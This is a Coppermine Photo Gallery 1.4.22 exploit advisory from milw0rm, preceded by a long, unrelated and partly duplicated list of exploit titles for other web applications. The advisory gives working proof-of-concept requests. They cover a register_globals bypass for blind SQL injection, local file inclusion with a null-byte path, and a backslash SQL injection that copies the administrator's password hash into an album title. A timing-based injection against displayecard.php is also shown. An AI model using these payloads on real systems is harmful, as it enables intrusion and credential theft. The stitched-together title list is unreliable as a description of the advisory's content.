pastelcms 0.8.0 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
pastelcms 0.8.0 - Local File Inclusion / SQL Injection
mixedcms 1.0b - (Local File Inclusion / Arbitrary File Upload / Authentication Bypass/File Disclosure) Multiple Vulnerabilities
mixedcms 1.0b - Local File Inclusion / Arbitrary File Upload / Authentication Bypass / File Disclosure
fowlcms 1.1 - (Authentication Bypass / Local File Inclusion / Arbitrary File Upload) Multiple Vulnerabilities
fowlcms 1.1 - Authentication Bypass / Local File Inclusion / Arbitrary File Upload
photo-rigma.biz 30 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
photo-rigma.biz 30 - SQL Injection / Cross-Site Scripting
Dew-NewPHPLinks 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Dew-NewPHPLinks 2.0 - Local File Inclusion / Cross-Site Scripting
Leap CMS 0.1.4 - (SQL Injection / Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities
Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload
TemaTres 1.0.3 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
TemaTres 1.0.3 - Authentication Bypass / SQL Injection / Cross-Site Scripting
PHP recommend 1.3 - (Authentication Bypass / Remote File Inclusion / Code Inject) Multiple Vulnerabilities
PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Inject
my-colex 1.4.2 - (Authentication Bypass / Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
my-gesuad 0.9.14 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection
my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting
vidshare pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
vidshare pro - SQL Injection / Cross-Site Scripting
asp inline Corporate Calendar - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
asp inline Corporate Calendar - SQL Injection / Cross-Site Scripting
minitwitter 0.3-beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
minitwitter 0.3-beta - SQL Injection / Cross-Site Scripting
small pirate 2.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
amember 3.1.7 - (Cross-Site Scripting / SQL Injection / HTML Injection) Multiple Vulnerabilities
small pirate 2.1 - Cross-Site Scripting / SQL Injection
amember 3.1.7 - Cross-Site Scripting / SQL Injection / HTML Injection
elitecms 1.01 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
elitecms 1.01 - SQL Injection / Cross-Site Scripting
flashlight free edition - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
flashlight free edition - Local File Inclusion / SQL Injection
propertymax pro free - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
propertymax pro free - SQL Injection / Cross-Site Scripting
virtue news - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
virtue news - SQL Injection / Cross-Site Scripting
mrcgiguy freeticket - (Cookie Handling / SQL Injection) Multiple Vulnerabilities
mrcgiguy freeticket - Cookie Handling / SQL Injection
yogurt 0.3 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
yogurt 0.3 - Cross-Site Scripting / SQL Injection
campus virtual-lms - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
campus virtual-lms - Cross-Site Scripting / SQL Injection
translucid 1.75 - Multiple Vulnerabilities
TransLucid 1.75 - Multiple Vulnerabilities
impleo music Collection 2.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
impleo music Collection 2.0 - SQL Injection / Cross-Site Scripting
adaptweb 0.9.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
adaptweb 0.9.2 - Local File Inclusion / SQL Injection
CMS buzz - (Cross-Site Scripting / Password Change/HTML Injection) Multiple Vulnerabilities
CMS buzz - Cross-Site Scripting / Password Change / HTML Injection
elgg - (Cross-Site Scripting / Cross-Site Request Forgery/Change Password) Multiple Vulnerabilities
elgg - Cross-Site Scripting / Cross-Site Request Forgery / Change Password
phpCollegeExchange 0.1.5c - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
phpCollegeExchange 0.1.5c - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting
Tribiq CMS 5.0.12c - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities
Tribiq CMS 5.0.12c - Cross-Site Scripting / Local File Inclusion
Virtue Online Test Generator - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Virtue Online Test Generator - Authentication Bypass / SQL Injection / Cross-Site Scripting
webasyst shop-script - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
webasyst shop-script - Blind SQL Injection / Cross-Site Scripting
ebay clone 2009 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities
ebay clone 2009 - Cross-Site Scripting / Blind SQL Injection
censura 1.16.04 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
censura 1.16.04 - Blind SQL Injection / Cross-Site Scripting
good/bad vote - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities
good/bad vote - Cross-Site Scripting / Local File Inclusion
mcshoutbox 1.1 - (SQL Injection / Cross-Site Scripting / shell) Multiple Vulnerabilities
mcshoutbox 1.1 - SQL Injection / Cross-Site Scripting / shell
Million-Dollar Pixel Ads Platinum - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Million-Dollar Pixel Ads Platinum - SQL Injection / Cross-Site Scripting
almond Classifieds ads - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
skadate dating - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
XOOPS Celepar Module Qas - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
garagesalesjunkie - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
almond Classifieds ads - Blind SQL Injection / Cross-Site Scripting
skadate dating - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting
XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting
garagesalesjunkie - SQL Injection / Cross-Site Scripting
iwiccle 1.01 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
iwiccle 1.01 - Local File Inclusion / SQL Injection
Orbis CMS 1.0 - (File Delete/Download File / Arbitrary File Upload / SQL Injection) Multiple Vulnerabilities
Orbis CMS 1.0 - File Delete / Download File / Arbitrary File Upload / SQL Injection
cmsphp 0.21 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
d.net CMS - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
cmsphp 0.21 - Local File Inclusion / Cross-Site Scripting
d.net CMS - Local File Inclusion / SQL Injection
mobilelib gold 3.0 - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities
mobilelib gold 3.0 - Authentication Bypass / SQL Injection
elvin bts 1.2.2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
elvin bts 1.2.2 - SQL Injection / Cross-Site Scripting
shopmaker CMS 2.0 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities
shopmaker CMS 2.0 - Blind SQL Injection / Local File Inclusion
mybackup 1.4.0 - (File Download / Remote File Inclusion) Multiple Vulnerabilities
tenrok 1.1.0 - (File Disclosure / Remote Code Execution) Multiple Vulnerabilities
mybackup 1.4.0 - File Download / Remote File Inclusion
tenrok 1.1.0 - File Disclosure / Remote Code Execution
AccessoriesMe PHP Affiliate Script 1.4 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
opennews 1.0 - (SQL Injection / Remote Code Execution) Multiple Vulnerabilities
AccessoriesMe PHP Affiliate Script 1.4 - Blind SQL Injection / Cross-Site Scripting
opennews 1.0 - SQL Injection / Remote Code Execution
PHP Script Forum Hoster - (Topic Delete / Cross-Site Scripting) Multiple Vulnerabilities
PHP Script Forum Hoster - Topic Delete / Cross-Site Scripting
LM Starmail 2.0 - (SQL Injection / File Inclusion) Multiple Vulnerabilities
LM Starmail 2.0 - SQL Injection / File Inclusion
logoshows bbs 2.0 - (File Disclosure / Insecure Cookie Handling) Multiple Vulnerabilities
logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling
tgs CMS 0.x - (Cross-Site Scripting / SQL Injection / File Disclosure) Multiple Vulnerabilities
tgs CMS 0.x - Cross-Site Scripting / SQL Injection / File Disclosure
Vtiger CRM 5.0.4 - (Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Vtiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting
totalcalendar 2.4 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities
totalcalendar 2.4 - Blind SQL Injection / Local File Inclusion
nullam blog 0.1.2 - (Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
nullam blog 0.1.2 - Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting
gyro 5.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
gyro 5.0 - SQL Injection / Cross-Site Scripting
Joomla! Component Hotel Booking System - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Joomla! Component Hotel Booking System - Cross-Site Scripting / SQL Injection
Micro CMS 3.5 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities
Micro CMS 3.5 - SQL Injection / Local File Inclusion
Ez Blog 1.0 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
Ez Blog 1.0 - Cross-Site Scripting / Cross-Site Request Forgery
Recipe Script 5.0 - (Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities
Recipe Script 5.0 - Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting
eUploader PRO 3.1.1 - (Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities
eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting
Pre Job Board 1.0 - SQL Bypass
Pre Job Board 1.0 - SQL Authentication Bypass
Pre Jobo .NET - SQL Bypass
Pre Jobo .NET - SQL Authentication Bypass
PHPDirector Game Edition 0.1 - (Local File Inclusion / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
PHPDirector Game Edition 0.1 - Local File Inclusion / SQL Injection / Cross-Site Scripting
gridcc script 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
gridcc script 1.0 - SQL Injection / Cross-Site Scripting
Layout CMS 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Layout CMS 1.0 - SQL Injection / Cross-Site Scripting
KosmosBlog 0.9.3 - (SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
KosmosBlog 0.9.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery
ZeusCMS 0.2 - (Database Backup Dump / Local File Inclusion) Multiple Vulnerabilities
ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion
Katalog Stron Hurricane 1.3.5 - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities
Katalog Stron Hurricane 1.3.5 - Remote File Inclusion / SQL Injection
Open Source Classifieds 1.1.0 - Alpha (OSClassi) Multiple Vulnerabilities
Open Source Classifieds 1.1.0 Alpha (OSClassi) - SQL Injection / Cross-Site Scripting / Arbitrary Admin Change
phpMySite - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
phpMySite - Cross-Site Scripting / SQL Injection
quality point 1.0 newsfeed - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
quality point 1.0 newsfeed - SQL Injection / Cross-Site Scripting
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities
DynPG CMS 4.1.0 - popup.php / counter.php Multiple Vulnerabilities
jevoncms - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities
jevoncms - Local File Inclusion / Remote File Inclusion
SIESTTA 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities
JV2 Folder Gallery 3.1.1 - 'popup_slideshow.php' Multiple Vulnerabilities
parlic Design - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities
parlic Design - SQL Injection / Cross-Site Scripting / HTML Injection
MileHigh Creative - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities
MileHigh Creative - SQL Injection / Cross-Site Scripting / HTML Injection
QuickTalk 1.2 - (Source Code Disclosure) Multiple Vulnerabilities
QuickTalk 1.2 - Source Code Disclosure
K-Search - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
K-Search - SQL Injection / Cross-Site Scripting
Macs CMS 1.1.4 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
Macs CMS 1.1.4 - Cross-Site Scripting / Cross-Site Request Forgery
Guestbook Script PHP - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities
Guestbook Script PHP - Cross-Site Scripting / HTML Injection
Max's Guestbook - (HTML Injection / Cross-Site Scripting) Multiple Vulnerabilities
Max's Guestbook - HTML Injection / Cross-Site Scripting
Allpc 2.5 osCommerce - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Allpc 2.5 osCommerce - SQL Injection / Cross-Site Scripting
TradeMC E-Ticaret - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
TradeMC E-Ticaret - SQL Injection / Cross-Site Scripting
Cag CMS 0.2 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities
Cag CMS 0.2 - Cross-Site Scripting / Blind SQL Injection
Tastydir 1.2 - (1216) Multiple Vulnerabilities
Tastydir 1.2 (1216) - Multiple Vulnerabilities
WordPress - 'do_trackbacks()' function SQL Injection
WordPress 3.0.1 - 'do_trackbacks()' function SQL Injection
F3Site 2011 alfa 1 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
F3Site 2011 alfa 1 - Cross-Site Scripting / Cross-Site Request Forgery
PHP Coupon Script 6.0 - (bus) Blind SQL Injection
PHP Coupon Script 6.0 - 'bus' Parameter Blind SQL Injection
GAzie 5.10 - (Login Parameter) Multiple Vulnerabilities
GAzie 5.10 - Login Parameter Multiple Vulnerabilities
BST - BestShopPro (nowosci.php) Multiple Vulnerabilities
BST (BestShopPro) - 'nowosci.php' Multiple Vulnerabilities
Fork CMS 3.2.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Fork CMS 3.2.4 - Local File Inclusion / Cross-Site Scripting
DFLabs PTK 1.0.5 - (Steal Authentication Credentials) Multiple Vulnerabilities
DFLabs PTK 1.0.5 - Steal Authentication Credentials
Wolfcms 0.75 - (Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities
Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting
Axous 1.1.1 - (Cross-Site Request Forgery / Persistent Cross-Site Scripting) Multiple Vulnerabilities
Axous 1.1.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
myPHPNuke 1.8.8 - links.php Cross-Site Scripting
myPHPNuke 1.8.8 - 'links.php' Cross-Site Scripting
Flying Dog Software Powerslave 4.3 Portalmanager - sql_id Information Disclosure
Flying Dog Software Powerslave 4.3 Portalmanager - 'sql_id' Information Disclosure
PHPWebGallery 1.3.4/1.5.1 - comments.php Multiple Parameter SQL Injection
PHPWebGallery 1.3.4/1.5.1 - category.php search Parameter SQL Injection
PHPWebGallery 1.3.4/1.5.1 - picture.php image_id Parameter SQL Injection
PHPWebGallery 1.3.4/1.5.1 - 'comments.php' SQL Injection
PHPWebGallery 1.3.4/1.5.1 - 'category.php' SQL Injection
PHPWebGallery 1.3.4/1.5.1 - 'picture.php' SQL Injection
myPHPNuke 1.8.8 - reviews.php letter Parameter Cross-Site Scripting
myPHPNuke 1.8.8 - download.php dcategory Parameter Cross-Site Scripting
myPHPNuke 1.8.8 - 'reviews.php' Cross-Site Scripting
myPHPNuke 1.8.8 - 'download.php' Cross-Site Scripting
phpVID 1.2.3 - Multiple Vulnerabilities
PHPVID 1.2.3 - Multiple Vulnerabilities
PHPWebGallery 1.4.1 - category.php Multiple Parameter Cross-Site Scripting
PHPWebGallery 1.4.1 - picture.php Multiple Parameter Cross-Site Scripting
PHPWebGallery 1.4.1 - 'category.php' Cross-Site Scripting
PHPWebGallery 1.4.1 - 'picture.php' Cross-Site Scripting
phpMyAdmin 2.7 - sql.php Cross-Site Scripting
phpMyAdmin 2.7 - 'sql.php' Cross-Site Scripting
ADOdb 4.6/4.7 - Tmssql.php Cross-Site Scripting
ADODB 4.6/4.7 - 'Tmssql.php' Cross-Site Scripting
PHPWebGallery 1.x - comments.php Cross-Site Scripting
PHPWebGallery 1.x - 'comments.php' Cross-Site Scripting
MySQLDumper 1.21 - sql.php Cross-Site Scripting
MySQLDumper 1.21 - 'sql.php' Cross-Site Scripting
KikChat - (Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities
KikChat - Local File Inclusion / Remote Code Execution
EasyE-Cards 3.10 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
EasyE-Cards 3.10 - SQL Injection / Cross-Site Scripting
LuxCal 3.2.2 - (Cross-Site Request Forgery/Blind SQL Injection) Multiple Vulnerabilities
LuxCal 3.2.2 - Cross-Site Request Forgery / Blind SQL Injection
Vastal I-Tech DVD Zone - view_mag.php mag_id Parameter SQL Injection
Vastal I-Tech DVD Zone - view_mag.php mag_id Parameter Cross-Site Scripting
Vastal I-Tech DVD Zone - 'view_mag.php' SQL Injection
Vastal I-Tech DVD Zone - 'view_mag.php' Cross-Site Scripting
Interspire Email Marketer - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities
Interspire Email Marketer - Cross-Site Scripting / HTML Injection / SQL Injection
ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Query Execution
ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution
miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery (Execute SQL Query)
miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery (SQL Execution)
ntop-ng 2.5.160805 - Username Enumeration
ntop-ng 2.5.160805 - Username Enumeration
276 lines
11 KiB
Text
Executable file
276 lines
11 KiB
Text
Executable file
Author: girex
|
|
Site: http://girex.altervista.org/
|
|
|
|
CMS: Coppermine Photo Gallery <= 1.4.22
|
|
|
|
|
|
Coppermine Foto Gallery suffers from different vulnerabilities.
|
|
|
|
There is a Local File Inclusion and a Blind SQL Injection working with
|
|
register_globals = On and magic_quotes_gpc = Off
|
|
and
|
|
a SQL Injection working in case of registration is enabled and a user can create/modify albums
|
|
(default setting if registration is enabled) and php.ini regardless
|
|
and
|
|
a Blind SQL Injection when is enabled the ecard logging system
|
|
(that is not a default configuration) and php.ini regardless
|
|
|
|
Let's see how do they work...
|
|
|
|
-------------------------------------------------------------------------------------------
|
|
|
|
Is possible to bypass the anti-register_global protection and obtain a blind sql injection or a local file inclusion.
|
|
|
|
I couldn't find a better way to exploit bypassing the anti-register_global protection so i just write this
|
|
Proof of Concepts.
|
|
|
|
Let's see the anti-register_globals protection and how to bypass it...
|
|
|
|
File: /includes/init.inc.php - lines: 42-65
|
|
|
|
$keysToSkip = array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER', 'HTML_SUBST', 'keysToSkip', 'register_globals_flag', 'cpgdebugger');
|
|
|
|
if (ini_get('register_globals') == '1' || strtolower(ini_get('register_globals')) == 'on') {
|
|
$register_globals_flag = true;
|
|
} else {
|
|
$register_globals_flag = false;
|
|
}
|
|
|
|
if (get_magic_quotes_gpc()) {
|
|
if (is_array($_POST)) {
|
|
foreach ($_POST as $key => $value) {
|
|
if (!is_array($value))
|
|
$_POST[$key] = strtr(stripslashes($value), $HTML_SUBST);
|
|
if (!in_array($key, $keysToSkip) && isset($$key) && $register_globals_flag) unset($$key);
|
|
}
|
|
}
|
|
|
|
if (is_array($_GET)) {
|
|
foreach ($_GET as $key => $value) {
|
|
unset($_GET[$key]);
|
|
$_GET[strtr(stripslashes($key), $HTML_SUBST)] = strtr(stripslashes($value), $HTML_SUBST);
|
|
if (!in_array($key, $keysToSkip) && isset($$key) && $register_globals_flag) unset($$key);
|
|
}
|
|
}
|
|
|
|
Same happens for $_COOKIE and $_SERVER vars and also with magic_quotes_gpc = off
|
|
This protection is easily bypassable defining GLOBALS vars via GET or via POST.
|
|
|
|
Example: index.php?GLOBALS[dummy_example]=damn
|
|
It defines the global var dummy_example.
|
|
|
|
Let's see how to exploit it...
|
|
|
|
File: ./thumbnails.php - lines: 79-
|
|
|
|
if (isset($_GET['sort'])) $USER['sort'] = $_GET['sort'];
|
|
if (isset($_GET['cat'])) $cat = (int)$_GET['cat']; <== bypass the int cast
|
|
if (isset($_GET['album'])) $album = $_GET['album'];
|
|
|
|
...
|
|
if (is_numeric($album)) {
|
|
...
|
|
|
|
} else {
|
|
$album_set_array = array();
|
|
if ($cat == USER_GAL_CAT)
|
|
$where = 'category > ' . FIRST_USER_CAT;
|
|
else
|
|
$where = "category = '$cat'";
|
|
|
|
$result = cpg_db_query("SELECT aid FROM {$CONFIG['TABLE_ALBUMS']} WHERE $where"); <== Vulnerable query
|
|
|
|
|
|
Here's a proof of concept:
|
|
NOTE: - we need register_globals = on and magic_quotes_gpc = off
|
|
|
|
[target]/[path]/thumnails.php?album=alpha&GLOBALS[cat]=99999' OR 1=1%23 true
|
|
[target]/[path]/thumnails.php?album=alpha&GLOBALS[cat]=99999' OR 1=2%23 false
|
|
|
|
-------------------------------------------------------------------------------------------
|
|
|
|
It's also possible to obtain a local file inclusion overwriting $USER array and in particular
|
|
$USER['lang'] vars...
|
|
|
|
File: /include/functions.inc.php - lines: 128-135
|
|
|
|
function user_get_profile()
|
|
{
|
|
global $CONFIG, $USER;
|
|
|
|
if (isset($_COOKIE[$CONFIG['cookie_name'].'_data'])) {
|
|
$USER = @unserialize(@base64_decode($_COOKIE[$CONFIG['cookie_name'].'_data']));
|
|
$USER['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________'); <== we bypass it
|
|
}
|
|
|
|
if (!isset($USER['ID']) || strlen($USER['ID']) != 32) {
|
|
list($usec, $sec) = explode(' ', microtime());
|
|
$seed = (float) $sec + ((float) $usec * 100000);
|
|
srand($seed);
|
|
$USER=array('ID' => md5(uniqid(rand(),1)));
|
|
} else {
|
|
$USER['ID'] = addslashes($USER['ID']);
|
|
}
|
|
|
|
if (!isset($USER['am'])) $USER['am'] = 1;
|
|
}
|
|
|
|
File: /includes/init.inc.php - lines: 318-346
|
|
|
|
if (isset($USER['lang']) && !strstr($USER['lang'], '/') && file_exists('lang/' . $USER['lang'] . '.php'))
|
|
{
|
|
$CONFIG['default_lang'] = $CONFIG['lang']; // Save default language
|
|
$CONFIG['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________');
|
|
}
|
|
elseif ($CONFIG['charset'] == 'utf-8') <== default configuration
|
|
{
|
|
include('include/select_lang.inc.php');
|
|
if (file_exists('lang/' . $USER['lang'] . '.php'))
|
|
{
|
|
$CONFIG['default_lang'] = $CONFIG['lang']; // Save default language
|
|
$CONFIG['lang'] = $USER['lang'];
|
|
}
|
|
}
|
|
else
|
|
{
|
|
unset($USER['lang']);
|
|
}
|
|
|
|
if (isset($CONFIG['default_lang']) && ($CONFIG['default_lang']==$CONFIG['lang']))
|
|
{
|
|
unset($CONFIG['default_lang']);
|
|
}
|
|
|
|
if (!file_exists("lang/{$CONFIG['lang']}.php"))
|
|
$CONFIG['lang'] = 'english';
|
|
|
|
// We load the chosen language file
|
|
require "lang/{$CONFIG['lang']}.php"; <== vulnerable include
|
|
|
|
|
|
Here's a proof of concept:
|
|
NOTE: - we need register_globals = on and magic_quotes_gpc = off
|
|
|
|
GET /[path]/index.php?GLOBALS[USER][ID]=5b83a5f92603efcdb65d47c9a2991d6b&GLOBALS[USER][lang]=../README.txt%00 HTTP/1.1
|
|
Host: [host]
|
|
Connection: close
|
|
|
|
This will include README.txt, if register_globals=on magic_quotes_gpc=off
|
|
and if User-Agent and Accept-Language headers are not set. (see code)
|
|
|
|
-------------------------------------------------------------------------------------------
|
|
|
|
When registration are enabled and a user can create/modify albums with password is possible
|
|
to obatain a blind sql injection php.ini regardless.
|
|
|
|
File: ./db_input.php
|
|
|
|
$event = isset($_POST['event']) ? $_POST['event'] : $_GET['event'];
|
|
switch ($event) {
|
|
|
|
...
|
|
|
|
case 'album_update':
|
|
if (!(USER_ADMIN_MODE || GALLERY_ADMIN_MODE)) cpg_die(ERROR, $lang_errors['perm_denied'], __FILE__, __LINE__); <== USER_ADMIN_MODE is TRUE if we are logged in
|
|
|
|
$aid = (int)$_POST['aid'];
|
|
$title = addslashes(trim($_POST['title']));
|
|
$category = (int)$_POST['category'];
|
|
$description = addslashes(trim($_POST['description']));
|
|
$keyword = addslashes(trim($_POST['keyword']));
|
|
$thumb = (int)$_POST['thumb'];
|
|
$visibility = (int)$_POST['visibility'];
|
|
$uploads = $_POST['uploads'] == 'YES' ? 'YES' : 'NO';
|
|
$comments = $_POST['comments'] == 'YES' ? 'YES' : 'NO';
|
|
$votes = $_POST['votes'] == 'YES' ? 'YES' : 'NO';
|
|
$password = $_POST['alb_password']; <== this var is not addslashed
|
|
$password_hint = addslashes(trim($_POST['alb_password_hint']));
|
|
$visibility = !empty($password) ? FIRST_USER_CAT + USER_ID : $visibility;
|
|
|
|
if (!$title) cpg_die(ERROR, $lang_db_input_php['alb_need_title'], __FILE__, __LINE__);
|
|
|
|
if (GALLERY_ADMIN_MODE) {
|
|
$query = "UPDATE {$CONFIG['TABLE_ALBUMS']} SET title='$title', description='$description', category='$category', thumb='$thumb', uploads='$uploads', comments='$comments', votes='$votes', visibility='$visibility', alb_password='$password', alb_password_hint='$password_hint', keyword='$keyword' WHERE aid='$aid' LIMIT 1";
|
|
} else {
|
|
$category = FIRST_USER_CAT + USER_ID;
|
|
$query = "UPDATE {$CONFIG['TABLE_ALBUMS']} SET title='$title', description='$description', thumb='$thumb', comments='$comments', votes='$votes', visibility='$visibility', alb_password='$password', <== vulnerable query alb_password_hint='$password_hint',keyword='$keyword' WHERE aid='$aid' AND category='$category' LIMIT 1";
|
|
}
|
|
|
|
$update = cpg_db_query($query);
|
|
|
|
$_POST['alb_password'] is not addslashed before being used in a query.
|
|
You must know that all _GET _POST _REQUEST variables are sanizated in init.inc.php...
|
|
|
|
File: /include/init.inc.php
|
|
|
|
// Do some cleanup in GET, POST and cookie data and un-register global vars
|
|
$HTML_SUBST = array('&' => '&', '"' => '"', '<' => '<', '>' => '>', '%26' => '&', '%22' => '"', '%3C' => '<', '%3E' => '>','%27' => ''', "'" => ''');
|
|
|
|
...
|
|
$_POST[$key] = strtr(stripslashes($value), $HTML_SUBST);
|
|
...
|
|
$_GET[strtr(stripslashes($key), $HTML_SUBST)] = strtr(stripslashes($value), $HTML_SUBST);
|
|
...
|
|
$_REQUEST[$key] = strtr(stripslashes($value), $HTML_SUBST);
|
|
|
|
|
|
So quotes are fixed, but what about backslash (\). We can manipulate the query inserting a backslash at the end of
|
|
$_POST['alb_password'] and execute SQL in $_POST['alb_password_hint'] parameter.
|
|
|
|
|
|
Here's a Proof of Concept:
|
|
NOTE: - registration must be enabled and an user must can create/modify albums
|
|
- works regardless of php.ini settings
|
|
|
|
- Log in with your user credential
|
|
- Create an album with password
|
|
- Do this request:
|
|
|
|
POST /[path]/db_input.php HTTP/1.1
|
|
Host: [host]
|
|
Keep-Alive: 300
|
|
Connection: keep-alive
|
|
Cookie: [your_cookies]
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
event=album_update&title=x&aid=[YOUR_ALBUM_ID]&alb_password=%5C&alb_password_hint=,title=(SELECT user_password FROM cpg14x_users WHERE user_id=1) WHERE aid=[YOUR_ALBUM_ID]%23
|
|
|
|
You will set the admin's password (user with user_id=1) as the title of your album.
|
|
|
|
-------------------------------------------------------------------------------------------
|
|
|
|
And we have also a Blind SQL Injection with a specific configuration of coppermine...
|
|
|
|
File: ./displayecard.php - lines 26-38
|
|
|
|
if (!isset($_GET['data'])) cpg_die(CRITICAL_ERROR, $lang_errors['param_missing'], __FILE__, __LINE__);
|
|
|
|
$data = array();
|
|
$data = @unserialize(@base64_decode($_GET['data']));
|
|
|
|
// attempt to obtain full link from db if ecard logging enabled and min 12 chars of data is provided and only 1 match
|
|
if ((!is_array($data)) && $CONFIG['log_ecards'] && (strlen($_GET['data']) > 12)) {
|
|
$result = cpg_db_query("SELECT link FROM {$CONFIG['TABLE_ECARDS']} WHERE link LIKE '{$_GET['data']}%'");
|
|
if (mysql_num_rows($result) === 1) {
|
|
$row = mysql_fetch_assoc($result);
|
|
$data = @unserialize(@base64_decode($row['link']));
|
|
}
|
|
}
|
|
|
|
|
|
Here's a Proof of Concept:
|
|
NOTE: - $CONFIG['log_ecards'] must be set to 1 (and this is NOT a default config)
|
|
- works regardless of php.ini settings
|
|
|
|
Make an injection with this php code:
|
|
<?php
|
|
$injection = "%' OR BENCHMARK(999999, md5(0))#";
|
|
$injection = urlencode(base64_encode(serialize($injection)));
|
|
?>
|
|
|
|
Then:
|
|
GET http://[host]/[path]/displayecard.php?data=[$injection] HTTP/1.1
|
|
|
|
girex
|
|
|
|
# milw0rm.com [2009-05-18]
|